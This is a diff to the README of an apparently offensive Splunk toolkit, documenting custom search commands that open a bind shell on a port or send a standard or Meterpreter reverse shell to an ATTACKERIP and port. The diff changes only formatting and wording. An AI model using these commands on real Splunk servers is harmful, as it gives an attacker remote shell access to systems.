DaddyBigFish/splunk_shells/README.md

 ## Bind Shell

-'| bindshell SHELLTYPE PORTNUMBER'
+`| bindshell SHELLTYPE PORTNUMBER`

-SHELLTYPE - Specify std or msf (std = Standard Shell|msf = Meterpreter Shell)
+SHELLTYPE - Specify std or msf std = Standard Shell msf = Meterpreter Shell

 PORTNUMBER - Specify the port you want the bind shell to listen on.
-If you do not specify a port number it defaults to 8888
+Defaults to 8888

 ## Reverse Shell

-'| revshell SHELLTYPE ATTACKERIP ATTACKERPORT'
+`| revshell SHELLTYPE ATTACKERIP ATTACKERPORT`

-SHELLTYPE - Specify std or msf (std = Standard Shell|msf = Meterpreter Shell)
+SHELLTYPE - Specify std or msf std = Standard Shell msf = Meterpreter Shell

-ATTACKERIP - Specify the IP that you want to shell to be sent back to.
+ATTACKERIP - Specify the IP that you want the shell to be sent back to.

 ATTACKERPORT - Specify the port you want the shell to be sent back to.